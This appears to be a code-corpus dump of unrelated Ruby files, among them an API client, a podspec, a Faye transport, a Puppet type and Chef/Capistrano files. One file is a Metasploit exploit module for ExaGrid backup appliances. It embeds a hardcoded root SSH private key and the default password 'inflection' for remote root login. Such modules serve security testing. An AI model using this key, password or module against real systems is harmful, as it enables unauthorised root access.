:body => post_body, :auth_names => auth_names, :return_type => return_type ) data, status_code, headers = @api_client.call_api(:GET, local_var_path, new_options) if @api_client.config.debugging @api_client.config.logger.debug "API called: NotebooksAPI#list_notebooks\nData: #{data.inspect}\nStatus code: #{status_code}\nHeaders: #{headers}" end return data, status_code, headers end # Update a notebook # Update a notebook using the specified ID. # @param notebook_id [Integer] Unique ID, assigned when you create the notebook. # @param body [NotebookUpdateRequest] Update notebook request body. # @param [Hash] opts the optional parameters # @return [NotebookResponse] def update_notebook(notebook_id, body, opts = {}) data, _status_code, _headers = update_notebook_with_http_info(notebook_id, body, opts) data end # Update a notebook # Update a notebook using the specified ID. # @param notebook_id [Integer] Unique ID, assigned when you create the notebook. # @param body [NotebookUpdateRequest] Update notebook request body. 
# @param [Hash] opts the optional parameters # @return [Array<(NotebookResponse, Integer, Hash)>] NotebookResponse data, response status code and response headers def update_notebook_with_http_info(notebook_id, body, opts = {}) if @api_client.config.unstable_operations.has_key?(:update_notebook) unstable_enabled = @api_client.config.unstable_operations[:update_notebook] if unstable_enabled @api_client.config.logger.warn format("Using unstable operation '%s'", "update_notebook") else raise APIError.new(message: format("Unstable operation '%s' is disabled", "update_notebook")) end end if @api_client.config.debugging @api_client.config.logger.debug 'Calling API: NotebooksAPI.update_notebook ...' end # verify the required parameter 'notebook_id' is set if @api_client.config.client_side_validation && notebook_id.nil? fail ArgumentError, "Missing the required parameter 'notebook_id' when calling NotebooksAPI.update_notebook" end # verify the required parameter 'body' is set if @api_client.config.client_side_validation && body.nil? fail ArgumentError, "Missing the required parameter 'body' when calling NotebooksAPI.update_notebook" end # resource path local_var_path = '/api/v1/notebooks/{notebook_id}'.sub('{' + 'notebook_id' + '}', CGI.escape(notebook_id.to_s)) # query parameters query_params = opts[:query_params] || {} # header parameters header_params = opts[:header_params] || {} # HTTP header 'Accept' (if needed) header_params['Accept'] = @api_client.select_header_accept(['application/json']) # HTTP header 'Content-Type' header_params['Content-Type'] = @api_client.select_header_content_type(['application/json']) # form parameters form_params = opts[:form_params] || {} # http body (model) post_body = opts[:debug_body] || @api_client.object_to_http_body(body) # return_type return_type = opts[:debug_return_type] || 'NotebookResponse' # auth_names auth_names = opts[:debug_auth_names] || [:apiKeyAuth, :appKeyAuth] new_options = opts.merge( :operation => :update_notebook, :header_params => header_params, :query_params => query_params, :form_params => form_params, :body => post_body, :auth_names => auth_names, :return_type => return_type ) data, status_code, headers = @api_client.call_api(:PUT, local_var_path, new_options) if @api_client.config.debugging @api_client.config.logger.debug "API called: NotebooksAPI#update_notebook\nData: #{data.inspect}\nStatus code: #{status_code}\nHeaders: #{headers}" end return data, status_code, headers end end end
43.396181
169
0.683606
5db2e676b00739419723d0461c72aa1a88ab9f9a
1,559
#
# Be sure to run `pod lib lint LVPopup.podspec' to ensure this is a
# valid spec before submitting.
#
# Any lines starting with a # are optional, but their use is encouraged
# To learn more about a Podspec see https://guides.cocoapods.org/syntax/podspec.html
#

Pod::Spec.new do |s|
  s.name             = 'LVPopup'
  s.version          = '0.1.0'
  s.summary          = 'A short description of LVPopup.'

# This description is used to generate tags and improve search results.
#   * Think: What does it do? Why did you write it? What is the focus?
#   * Try to keep it short, snappy and to the point.
#   * Write the description between the DESC delimiters below.
#   * Finally, don't worry about the indent, CocoaPods strips it!

  s.description      = <<-DESC
TODO: Add long description of the pod here.
                       DESC

  s.homepage         = 'https://github.com/levivig/LVPopup'
  # s.screenshots     = 'www.example.com/screenshots_1', 'www.example.com/screenshots_2'
  s.license          = { :type => 'MIT', :file => 'LICENSE' }
  s.author           = { 'levivig' => '[email protected]' }
  s.source           = { :git => 'https://github.com/levivig/LVPopup.git', :tag => s.version.to_s }
  # s.social_media_url = 'https://twitter.com/levivig'

  s.ios.deployment_target = '11.0'

  s.source_files = 'LVPopup/Classes/**/*'

  # s.resource_bundles = {
  #   'LVPopup' => ['LVPopup/Assets/*.png']
  # }

  # s.public_header_files = 'Pod/Classes/**/*.h'
  s.frameworks = 'UIKit'
  s.dependency 'SnapKit'
  s.dependency 'SwifterSwift'
end
35.431818
99
0.634381
1c260d4f5a7553b289bd0b100a3ee1e066515efe
2,919
name "Lxd" description "Personal Compute Cloud Service with LXD" version "0.1" maintainer "OneOps" maintainer_email "[email protected]" license "Apache License, Version 2.0" grouping 'default', :access => "global", :packages => [ 'base', 'mgmt.cloud.service', 'cloud.service' ], :namespace => true attribute 'endpoint', :description => "API Endpoint", :required => "required", :default => "", :format => { :help => 'LXD server REST endpoint', :category => '1.Authentication', :order => 1 } attribute 'client_cert', :description => "Client Cert", :data_type => "text", :required => "required", :default => "", :format => { :help => 'Client Certificate (use ~/.config/lxd/client.crt or generate new and use lxc config trust add)', :category => '1.Authentication', :order => 2 } attribute 'client_key', :description => "Client Key", :data_type => "text", :required => "required", :default => "", :format => { :help => 'Client Key (use ~/.config/lxd/client.key or generate new and use lxc config trust add)', :category => '1.Authentication', :order => 3 } attribute 'sizemap', :description => "Sizes Map", :data_type => "hash", :default => '{ "XS":"default","S":"default","M":"default","L":"default","XL":"default" }', :format => { :help => 'Map of generic compute sizes to LXD profiles', :category => '2.Mappings', :order => 1 } attribute 'imagemap', :description => "Images Map", :data_type => "hash", :default => '{"ubuntu-16.04":"ubuntu", "centos-7.0":"centos"}', :format => { :help => 'Map of generic OS image types to provider specific 64-bit OS image types', :category => '2.Mappings', :order => 2 } attribute 'repo_map', :description => "OS Package Repositories keyed by OS Name", :data_type => "hash", :default => '{}', :format => { :help => 'Map of repositories by OS Type containing add commands - ex) yum-config-manager --add-repo repository_url or deb http://us.archive.ubuntu.com/ubuntu/ hardy main restricted ', :category => '4.Operating System', :order => 1 } attribute 'env_vars', :description => "System Environment Variables", :data_type => "hash", :default => '{}', :format => { :help => 'Environment variables - ex) http => http://yourproxy, https => https://yourhttpsproxy, etc', :category => '4.Operating System', :order => 3 } attribute 'ostype', :description => "OS Type", :required => "required", :default => "ubuntu-16.04", :format => { :help => 'OS types are mapped to the correct cloud provider OS images - see provider documentation for details', :category => '4.Operating System', :order => 4, :form => { 'field' => 'select', 'options_for_select' => [ ['Ubuntu 16.04 (xenial)','ubuntu-16.04'], ['CentOS 7.0','centos-7.0']] } }
29.785714
188
0.602261
910aac3f390d4fb90759df7ba8e655a46d7b62f6
1,960
module Faye
  class Transport::Http < Transport
    def self.usable?(dispatcher, endpoint, &callback)
      callback.call(URI === endpoint)
    end

    def encode(messages)
      Faye.to_json(messages)
    end

    def request(messages)
      content = encode(messages)
      params = build_params(content)
      request = create_request(params)

      request.callback do
        handle_response(messages, request.response)
        store_cookies(request.response_header['SET_COOKIE'])
      end

      request.errback do
        handle_error(messages)
      end

      request
    end

    private

    def build_params(content)
      params = {
        :head => {
          'Content-Length' => content.bytesize,
          'Content-Type'   => 'application/json',
          'Host'           => @endpoint.host + (@endpoint.port ? ":#{@endpoint.port}" : '')
        }.merge(@dispatcher.headers),
        :body    => content,
        :timeout => -1 # for em-http-request < 1.0
      }
      cookie = get_cookies
      params[:head]['Cookie'] = cookie unless cookie == ''
      params
    end

    def create_request(params)
      version = EventMachine::HttpRequest::VERSION.split('.')[0].to_i
      options = {:inactivity_timeout => 0}

      if @proxy[:origin]
        uri = URI.parse(@proxy[:origin])
        options[:proxy] = {:host => uri.host, :port => uri.port}
        if uri.user
          options[:proxy][:authorization] = [uri.user, uri.password]
        end
      end

      if version >= 1
        client = EventMachine::HttpRequest.new(@endpoint.to_s, options)
      else
        client = EventMachine::HttpRequest.new(@endpoint.to_s)
      end

      client.post(params)
    end

    def handle_response(messages, response)
      replies = MultiJson.load(response) rescue nil
      if replies
        receive(replies)
      else
        handle_error(messages)
      end
    end
  end

  Transport.register 'long-polling', Transport::Http
end
23.614458
91
0.592347
03934c7e181439ca7f9cc8dff76297c31e094601
1,725
Puppet::Type.newtype(:rabbitmq_parameter) do desc 'Type for managing rabbitmq parameters' ensurable do defaultto(:present) newvalue(:present) do provider.create end newvalue(:absent) do provider.destroy end end autorequire(:service) { 'rabbitmq-server' } validate do fail('component_name parameter is required.') if self[:ensure] == :present and self[:component_name].nil? fail('value parameter is required.') if self[:ensure] == :present and self[:value].nil? end newparam(:name, :namevar => true) do desc 'combination of name@vhost to set parameter for' newvalues(/^\S+@\S+$/) end newproperty(:component_name) do desc 'The component_name to use when setting parameter, eg: shovel or federation' validate do |value| resource.validate_component_name(value) end end newproperty(:value) do desc 'A hash of values to use with the component name you are setting' validate do |value| resource.validate_value(value) end munge do |value| resource.munge_value(value) end end autorequire(:rabbitmq_vhost) do [self[:name].split('@')[1]] end def validate_component_name(value) if value.empty? raise ArgumentError, "component_name must be defined" end end def validate_value(value) unless [Hash].include?(value.class) raise ArgumentError, "Invalid value" end value.each do |k,v| unless [String, TrueClass, FalseClass].include?(v.class) raise ArgumentError, "Invalid value" end end end def munge_value(value) value.each do |k,v| if (v =~ /\A[-+]?[0-9]+\z/) value[k] = v.to_i end end value end end
23.310811
109
0.657391
7a60a499952eb201ecd0d6a0f860aa3a5a27b98c
2,151
# server-based syntax # ====================== # Defines a single server with a list of roles and multiple properties. # You can define all roles on a single server, or split them: # server 'example.com', user: 'deploy', roles: %w{app db web}, my_property: :my_value # server 'example.com', user: 'deploy', roles: %w{app web}, other_property: :other_value # server 'db.example.com', user: 'deploy', roles: %w{db} server '54.149.118.151', user: 'deploy', roles: %w{web app db} # role-based syntax # ================== # Defines a role with one or multiple servers. The primary server in each # group is considered to be the first unless any hosts have the primary # property set. Specify the username and a domain or IP for the server. # Don't use `:all`, it's a meta role. # role :app, %w{[email protected]}, my_property: :my_value # role :web, %w{[email protected] [email protected]}, other_property: :other_value # role :db, %w{[email protected]} # Configuration # ============= # You can set any configuration variable like in config/deploy.rb # These variables are then only loaded and set in this stage. # For available Capistrano configuration variables see the documentation page. # http://capistranorb.com/documentation/getting-started/configuration/ # Feel free to add new variables to customise your setup. # Custom SSH Options # ================== # You may pass any option but keep in mind that net/ssh understands a # limited set of options, consult the Net::SSH documentation. # http://net-ssh.github.io/net-ssh/classes/Net/SSH.html#method-c-start # # Global options # -------------- # set :ssh_options, { # keys: %w(/home/rlisowski/.ssh/id_rsa), # forward_agent: false, # auth_methods: %w(password) # } # # The server-based syntax can be used to override options: # ------------------------------------ # server 'example.com', # user: 'user_name', # roles: %w{web app}, # ssh_options: { # user: 'user_name', # overrides user setting above # keys: %w(/home/user_name/.ssh/id_rsa), # forward_agent: false, # auth_methods: %w(publickey password) # # password: 'please use keys' # }
34.693548
88
0.668991
d507925ec83e249c19787ffa5dfb56561a9352b0
1,123
#
# Author:: Adam Jacob (<[email protected]>)
# Copyright:: Copyright 2009-2016, Chef Software Inc.
# License:: Apache License, Version 2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#

require "chef/knife"

class Chef
  class Knife
    class DataBagList < Knife

      deps do
        require "chef/data_bag"
      end

      banner "knife data bag list (options)"
      category "data bag"

      option :with_uri,
        :short => "-w",
        :long => "--with-uri",
        :description => "Show corresponding URIs"

      def run
        output(format_list_for_display(Chef::DataBag.list))
      end

    end
  end
end
26.116279
74
0.680321
e96ff642991791e4c8a4b5c8fe83ca0e27209cdb
1,114
#Fibonacci Number Location by Length

def num_digits(num)
  num.to_i.to_s.length
end

def find_fibonacci_index_by_length(n)
  answer = 3 #start with 1, 1.
  fib_1_ago, fib_2_ago = 1, 1
  number_to_check = fib_1_ago + fib_2_ago

  while num_digits(number_to_check) < n
    fib_2_ago, fib_1_ago = fib_1_ago, number_to_check
    number_to_check = fib_1_ago + fib_2_ago
    answer += 1
  end

  answer
end

puts find_fibonacci_index_by_length(2) == 7 # 1 1 2 3 5 8 13
puts find_fibonacci_index_by_length(3) == 12 # 1 1 2 3 5 8 13 21 34 55 89 144
puts find_fibonacci_index_by_length(10) == 45
puts find_fibonacci_index_by_length(100) == 476
puts find_fibonacci_index_by_length(1000) == 4782
puts find_fibonacci_index_by_length(10000) == 47847

puts find_fibonacci_index_by_length(2)# == 7 # 1 1 2 3 5 8 13
puts find_fibonacci_index_by_length(3)# == 12 # 1 1 2 3 5 8 13 21 34 55 89 144
puts find_fibonacci_index_by_length(10)# == 45
puts find_fibonacci_index_by_length(100)# == 476
puts find_fibonacci_index_by_length(1000)# == 4782
puts find_fibonacci_index_by_length(10000)# == 47847
35.935484
86
0.740575
084a7151555d5687356bd1bded4e00604fe9c9bd
305
begin
  require 'openssl'
  OpenSSL # ensure OpenSSL is loaded

  vendor = File.expand_path('../vendor', __FILE__)
  $:.unshift(vendor) unless $:.include?(vendor)

  require 'net/http/persistent'
  USE_PERSISTENT = true
rescue LoadError, NameError => e
  require 'net/http'
  USE_PERSISTENT = false
end
19.0625
50
0.711475
18b9955f390c8a3cfddf19f9244e437888d69450
473
require 'test_helper'

class StaticPagesControllerTest < ActionDispatch::IntegrationTest
  test "should get home" do
    get static_pages_home_url
    assert_response :success
  end

  test "should get about" do
    get static_pages_about_url
    assert_response :success
  end

  test "should get band" do
    get static_pages_band_url
    assert_response :success
  end

  test "should get sport" do
    get static_pages_sport_url
    assert_response :success
  end

end
18.92
65
0.752643
012707a8ebffc57bd4c4aaccaa74d491ab740091
515
require "bundler/setup" require "storage" require "pathname" require "minitest/utils" require "minitest/autorun" require "mocha" require "mocha/mini_test" TMP = Pathname.new(File.expand_path(File.dirname(__FILE__) + "/tmp")) RESOURCES = Pathname.new(File.expand_path(File.dirname(__FILE__) + "/resources")) class Minitest::Test setup do FileUtils.rm_rf(TMP) rescue nil FileUtils.mkdir_p(TMP) rescue nil end end class NullObject def initialize(*) end def method_missing(*) self end end
17.758621
81
0.735922
f8628a0f9a9e60181e29dc11359379687e0932b8
50
module MlbBattingAverages
  VERSION = "0.1.0"
end
12.5
25
0.74
4a6aa11860399c44e44055b34fcd4d6348a022c9
896
require 'spec_helper'

require 'rollbar/delay/resque'

describe Rollbar::Delay::Resque do
  describe '.call' do
    let(:payload) do
      { :key => 'value' }
    end

    let(:loaded_hash) do
      Rollbar::JSON.load(Rollbar::JSON.dump(payload))
    end

    before do
      allow(Resque).to receive(:inline?).and_return(true)
    end

    it 'process the payload' do
      expect(Rollbar).to receive(:process_from_async_handler).with(loaded_hash)

      described_class.call(payload)
    end

    context 'with exceptions processing payload' do
      let(:exception) { Exception.new }

      before do
        expect(Rollbar).to receive(:process_from_async_handler)
          .with(loaded_hash)
          .and_raise(exception)
      end

      it 'raises an exception' do
        expect do
          described_class.call(payload)
        end.to raise_error(exception)
      end
    end
  end
end
22.4
79
0.642857
ff83ca9ec3216d97d275bf869362ff693c48ac16
626
class AuthController < ApplicationController
  before_action :authenticate_user!, :validate_service, except: :callback

  def callback
    login = Login.from_omniauth(request.env['omniauth.auth'])
    raise CanCan::AccessDenied.new('Not authorized!', :read, SupplyTeachers) unless login.permit?(:supply_teachers)

    user = find_or_create(login)
    sign_in user
    redirect_to session[:requested_path] || supply_teachers_path
  end

  protected

  def find_or_create(login)
    user = User.find_or_initialize_by(email: login.email)
    user.new_record?
    user.roles = %i[buyer st_access]
    user.save
    user
  end
end
27.217391
115
0.742812
3841029e98ef494daec9e930c849b662c216de06
5,586
# encoding: utf-8 # Code generated by Microsoft (R) AutoRest Code Generator. # Changes may cause incorrect behavior and will be lost if the code is # regenerated. module Azure::Network::Mgmt::V2019_08_01 module Models # # Route Filter Resource. # class RouteFilter < Resource include MsRestAzure # @return [Array<RouteFilterRule>] Collection of RouteFilterRules # contained within a route filter. attr_accessor :rules # @return [Array<ExpressRouteCircuitPeering>] A collection of references # to express route circuit peerings. attr_accessor :peerings # @return [Array<ExpressRouteCircuitPeering>] A collection of references # to express route circuit ipv6 peerings. attr_accessor :ipv6peerings # @return [ProvisioningState] The provisioning state of the route filter # resource. Possible values include: 'Succeeded', 'Updating', 'Deleting', # 'Failed' attr_accessor :provisioning_state # @return [String] A unique read-only string that changes whenever the # resource is updated. attr_accessor :etag # # Mapper for RouteFilter class as Ruby Hash. # This will be used for serialization/deserialization. # def self.mapper() { client_side_validation: true, required: false, serialized_name: 'RouteFilter', type: { name: 'Composite', class_name: 'RouteFilter', model_properties: { id: { client_side_validation: true, required: false, serialized_name: 'id', type: { name: 'String' } }, name: { client_side_validation: true, required: false, read_only: true, serialized_name: 'name', type: { name: 'String' } }, type: { client_side_validation: true, required: false, read_only: true, serialized_name: 'type', type: { name: 'String' } }, location: { client_side_validation: true, required: false, serialized_name: 'location', type: { name: 'String' } }, tags: { client_side_validation: true, required: false, serialized_name: 'tags', type: { name: 'Dictionary', value: { client_side_validation: true, required: false, serialized_name: 'StringElementType', type: { name: 'String' } } } }, rules: { client_side_validation: true, required: false, serialized_name: 'properties.rules', type: { name: 'Sequence', element: { client_side_validation: true, required: false, serialized_name: 'RouteFilterRuleElementType', type: { name: 'Composite', class_name: 'RouteFilterRule' } } } }, peerings: { client_side_validation: true, required: false, serialized_name: 'properties.peerings', type: { name: 'Sequence', element: { client_side_validation: true, required: false, serialized_name: 'ExpressRouteCircuitPeeringElementType', type: { name: 'Composite', class_name: 'ExpressRouteCircuitPeering' } } } }, ipv6peerings: { client_side_validation: true, required: false, serialized_name: 'properties.ipv6Peerings', type: { name: 'Sequence', element: { client_side_validation: true, required: false, serialized_name: 'ExpressRouteCircuitPeeringElementType', type: { name: 'Composite', class_name: 'ExpressRouteCircuitPeering' } } } }, provisioning_state: { client_side_validation: true, required: false, read_only: true, serialized_name: 'properties.provisioningState', type: { name: 'String' } }, etag: { client_side_validation: true, required: false, read_only: true, serialized_name: 'etag', type: { name: 'String' } } } } } end end end end
31.738636
79
0.440566
4a87355675d385629451c028b17d181d1e2e7eee
252
# Be sure to restart your server when you modify this file.

# All Legislative preferences are here.

Legislative::Application.config.application_name = 'Congreso Interactivo'
Legislative::Application.config.created_by_name = 'CongresoInteractivo.org'
36
75
0.81746
1aaef7a32e3c46490e2a92ac249e90defca35d29
70
load File.expand_path('../../../capistrano/tasks/ssh.rake', __FILE__)
35
69
0.7
e8a3fd1f1a0e193313b03650c072d8c018e469c3
548
# frozen_string_literal: true

# Define order by filter rule
#
module QueryFilter
  module Rules
    class OrderBy < Scope
      DIRECTIONS = %w[asc desc].freeze

      def name
        'order_by'
      end

      def valid?(params)
        params[key].present? && DIRECTIONS.include?(params[direction_key].try(:downcase))
      end

      def direction_key
        @direction_key ||= (@options[:via] || 'sort_direction').to_sym
      end

      def normalize_params(values)
        [values[key], values[direction_key]]
      end
    end
  end
end
19.571429
89
0.624088
ed815dd54bac0f8a8cea89ef98bc0347b2ece62c
270
class SuperDemandsController < ApplicationController
  def discard
    @demand = SuperDemand.find_by(discard_token: params[:token])
    @demand.update(discarded_at: Time.now)

    NotifyJob.perform_later("Super Demand discarded: #{@demand.email}", "DemandBot")
  end
end
33.75
84
0.759259
f8da5cda224e986351fb1bd1124a14ad2b6784d3
2,808
class ErlangAT20 < Formula desc "Programming language for highly scalable real-time systems" homepage "https://www.erlang.org/" # Download tarball from GitHub; it is served faster than the official tarball. url "https://github.com/erlang/otp/archive/OTP-20.3.8.24.tar.gz" sha256 "588e34a89f9ea8ebc3bda0918e4e1f4f7366888278f5e7ece60f6f1fa42aef60" bottle do cellar :any sha256 "ccdc86633693f2dec689584d3104cd50d32b43ca6367ec464750740c886e8ff1" => :catalina sha256 "4decc33224ae2cadf809ce5b11f6ca456fdd97cd9daec9174a8c15011e9dd34f" => :mojave sha256 "5a2ee8713cf03b0c9ee0671dc842599f7f1782e324bc8fd1313d28a8c55ccfd2" => :high_sierra end keg_only :versioned_formula depends_on "autoconf" => :build depends_on "automake" => :build depends_on "libtool" => :build depends_on "[email protected]" depends_on "wxmac" resource "man" do url "https://www.erlang.org/download/otp_doc_man_20.3.tar.gz" mirror "https://fossies.org/linux/misc/legacy/otp_doc_man_20.3.tar.gz" sha256 "17e0b2f94f11576a12526614a906ecad629b8804c25e6c18523f7c4346607112" end resource "html" do url "https://www.erlang.org/download/otp_doc_html_20.3.tar.gz" mirror "https://fossies.org/linux/misc/legacy/otp_doc_html_20.3.tar.gz" sha256 "8099b62e9fa24b3f90eaeda151fa23ae729c8297e7d3fd8adaca865b35a3125d" end def install # Work around Xcode 11 clang bug # https://bitbucket.org/multicoreware/x265/issues/514/wrong-code-generated-on-macos-1015 ENV.append_to_cflags "-fno-stack-check" if DevelopmentTools.clang_build_version >= 1010 # Unset these so that building wx, kernel, compiler and # other modules doesn't fail with an unintelligable error. %w[LIBS FLAGS AFLAGS ZFLAGS].each { |k| ENV.delete("ERL_#{k}") } # Do this if building from a checkout to generate configure system "./otp_build", "autoconf" if File.exist? "otp_build" args = %W[ --disable-debug --disable-silent-rules --prefix=#{prefix} --enable-dynamic-ssl-lib --enable-hipe --enable-kernel-poll --enable-sctp --enable-shared-zlib --enable-smp-support --enable-threads --enable-wx --with-ssl=#{Formula["[email protected]"].opt_prefix} --without-javac --enable-darwin-64bit ] args << "--with-dynamic-trace=dtrace" if MacOS::CLT.installed? system "./configure", *args system "make" system "make", "install" (lib/"erlang").install resource("man").files("man") doc.install resource("html") end def caveats; <<~EOS Man pages can be found in: #{opt_lib}/erlang/man Access them with `erl -man`, or add this directory to MANPATH. EOS end test do system "#{bin}/erl", "-noshell", "-eval", "crypto:start().", "-s", "init", "stop" end end
32.651163
93
0.702991
87b88941f4394384e4659b9ac4ebafcec9507463
5,862
## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'net/ssh' class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Auxiliary::Report include Msf::Exploit::Remote::SSH def initialize(info = {}) super(update_info(info, { 'Name' => 'ExaGrid Known SSH Key and Default Password', 'Description' => %q{ ExaGrid ships a public/private key pair on their backup appliances to allow passwordless authentication to other ExaGrid appliances. Since the private key is easily retrievable, an attacker can use it to gain unauthorized remote access as root. Additionally, this module will attempt to use the default password for root, 'inflection'. }, 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Privileged' => true, 'Targets' => [ [ "Universal", {} ] ], 'Payload' => { 'Compat' => { 'PayloadType' => 'cmd_interact', 'ConnectionType' => 'find', }, }, 'Author' => ['egypt'], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2016-1560' ], # password [ 'CVE', '2016-1561' ], # private key [ 'URL', 'https://community.rapid7.com/community/infosec/blog/2016/04/07/r7-2016-04-exagrid-backdoor-ssh-keys-and-hardcoded-credentials' ] ], 'DisclosureDate' => "Apr 07 2016", 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' }, 'DefaultTarget' => 0 })) register_options( [ # Since we don't include Tcp, we have to register this manually Opt::RHOST(), Opt::RPORT(22) ], self.class ) register_advanced_options( [ OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]), OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30]) ] ) end # helper methods that normally come from Tcp def rhost datastore['RHOST'] end def rport datastore['RPORT'] end def do_login(ssh_options) begin ssh_socket = nil ::Timeout.timeout(datastore['SSH_TIMEOUT']) do ssh_socket = Net::SSH.start(rhost, 'root', ssh_options) end rescue Rex::ConnectionError return rescue Net::SSH::Disconnect, ::EOFError print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation" return rescue ::Timeout::Error print_error "#{rhost}:#{rport} SSH - Timed out during negotiation" return rescue Net::SSH::AuthenticationFailed print_error "#{rhost}:#{rport} SSH - Failed authentication" rescue Net::SSH::Exception => e print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}" return end if ssh_socket # Create a new session from the socket, then dump it. conn = Net::SSH::CommandStream.new(ssh_socket, '/bin/bash -i', true) ssh_socket = nil return conn else return false end end # Ghetto hack to prevent the shell detection logic from hitting false # negatives due to weirdness with ssh sockets. We already know it's a shell # because auth succeeded by this point, so no need to do the check anyway. 
module TrustMeItsAShell def _check_shell(*args) true end end def exploit payload_instance.extend(TrustMeItsAShell) factory = ssh_socket_factory ssh_options = { auth_methods: ['publickey'], config: false, use_agent: false, key_data: [ key_data ], port: rport, proxy: factory, non_interactive: true } ssh_options.merge!(verbose: :debug) if datastore['SSH_DEBUG'] conn = do_login(ssh_options) unless is_success?(conn, true) ssh_options[:auth_methods] = ['password'] ssh_options[:password] = 'inflection' ssh_options.delete(:key_data) conn = do_login(ssh_options) is_success?(conn, false) end end def is_success?(conn,key_based) if conn print_good "Successful login" service_data = { address: rhost, port: rport, protocol: 'tcp', service_name: 'ssh', workspace_id: myworkspace_id, } credential_data = { username: 'root', private_type: ( key_based ? :ssh_key : :password ), private_data: ( key_based ? key_data : 'inflection' ), origin_type: :service, module_fullname: fullname, }.merge(service_data) core = create_credential(credential_data) login_data = { core: core, last_attempted: Time.now, }.merge(service_data) create_credential_login(login_data) handler(conn.lsock) true else false end end def key_data <<EOF -----BEGIN RSA PRIVATE KEY----- MIICWAIBAAKBgGdlD7qeGU9f8mdfmLmFemWMnz1tKeeuxKznWFI+6gkaagqjAF10 hIruzXQAik7TEBYZyvw9SvYU6MQFsMeqVHGhcXQ5yaz3G/eqX0RhRDn5T4zoHKZa E1MU86zqAUdSXwHDe3pz5JEoGl9EUHTLMGP13T3eBJ19MAWjP7Iuji9HAgElAoGA GSZrnBieX2pdjsQ55/AJA/HF3oJWTRysYWi0nmJUmm41eDV8oRxXl2qFAIqCgeBQ BWA4SzGA77/ll3cBfKzkG1Q3OiVG/YJPOYLp7127zh337hhHZyzTiSjMPFVcanrg AciYw3X0z2GP9ymWGOnIbOsucdhnbHPuSORASPOUOn0CQQC07Acq53rf3iQIkJ9Y iYZd6xnZeZugaX51gQzKgN1QJ1y2sfTfLV6AwsPnieo7+vw2yk+Hl1i5uG9+XkTs Ry45AkEAkk0MPL5YxqLKwH6wh2FHytr1jmENOkQu97k2TsuX0CzzDQApIY/eFkCj QAgkI282MRsaTosxkYeG7ErsA5BJfwJAMOXYbHXp26PSYy4BjYzz4ggwf/dafmGz ebQs+HXa8xGOreroPFFzfL8Eg8Ro0fDOi1lF7Ut/w330nrGxw1GCHQJAYtodBnLG XLMvDHFG2AN1spPyBkGTUOH2OK2TZawoTmOPd3ymK28LriuskwxrceNb96qHZYCk 86DC8q8p2OTzYwJANXzRM0SGTqSDMnnid7PGlivaQqfpPOx8MiFR/cGr2dT1HD7y x6f/85mMeTqamSxjTJqALHeKPYWyzeSnUrp+Eg== -----END RSA PRIVATE KEY----- EOF end end
29.756345
148
0.660355
ab1db5617d434705fe270c7df8dc5e15a85faebb
1,863
# frozen_string_literal: true

::RSpec.describe ::Koffer::Promise do
  let(:promise) { described_class.new }

  describe '#rescue' do
    context 'when the promise resolves' do
      subject! { promise.rescue { |reason| "recovered from #{reason.message}" } }

      before { promise.resolve(1) }

      it { is_expected.to have_attributes(state: :resolved, value: 1) }
    end

    context 'when the promise resolves and the block raises an error' do
      subject! { promise.rescue { |reason| raise reason } }

      before { promise.resolve(1) }

      it { is_expected.to have_attributes(state: :resolved, value: 1) }
    end

    context 'when the promise rejects' do
      subject! { promise.rescue { |reason| "recovered from #{reason.message}" } }

      before { promise.reject(::RuntimeError.new('total failure')) }

      it { is_expected.to have_attributes(state: :resolved, value: 'recovered from total failure') }
    end

    context 'when the promise rejects and the block raises an error' do
      subject! { promise.rescue { |reason| raise "failed: #{reason.message}" } }

      before { promise.reject(::RuntimeError.new('total failure')) }

      it { is_expected.to have_attributes(state: :rejected, reason: have_attributes(message: 'failed: total failure')) }
    end

    context 'when the promise is already resolved' do
      subject! { described_class.resolve(1).rescue { |reason| "recovered from #{reason.message}" } }

      it { is_expected.to have_attributes(state: :resolved, value: 1) }
    end

    context 'when the promise is already rejected' do
      subject! { described_class.reject(error).rescue { |reason| "recovered from #{reason.message}" } }

      let(:error) { ::RuntimeError.new('total failure') }

      it { is_expected.to have_attributes(state: :resolved, value: 'recovered from total failure') }
    end
  end
end
34.5
120
0.672034
398a85103e7eb1430b71fabc119f149f5900b42e
1,645
require 'spec_helper' module Boilerpipe::SAX describe HTMLContentHandler do describe '.new' do it 'sets up tag actions' it 'initializes state' end describe '#start_element' do it 'saves the last tag element' do subject.start_element 'div' expect(subject.last_start_tag).to eq :DIV end it 'converts the tag name into a symbol' do subject.start_element 'title' expect(subject.last_start_tag).to eq :TITLE end end describe '#characters' do end describe '#end_element' do end describe '#flush_block' do end describe '#text_document' do end describe '#token_buffer_size' do end describe '#is_word?' do end describe '#increase_in_ignorable_element!' do end describe '#decrease_in_ignorable_element!' do end describe '#enter_body_tag!' do end describe '#exit_body_tag!' do end describe '#in_ignorable_element?' do end describe '#in_anchor_tag?' do end describe '#add_text_block' do end describe '#append_space' do end describe '#append_text' do end describe '#append_token' do end describe '#add_label_action' do context 'with a nil as the last element in the label stacks' do before { subject.start_element('boom') } it 'removes that nil' do expect(subject.label_stacks.first).to eq nil subject.add_label_action(:boom) expect(subject.label_stacks.first).to eq [:boom] expect(subject.label_stacks.size).to eq 1 end end end end end
19.583333
69
0.63465
080501037c76d3aa1890f0b1c326569ac5b494c2
7,440
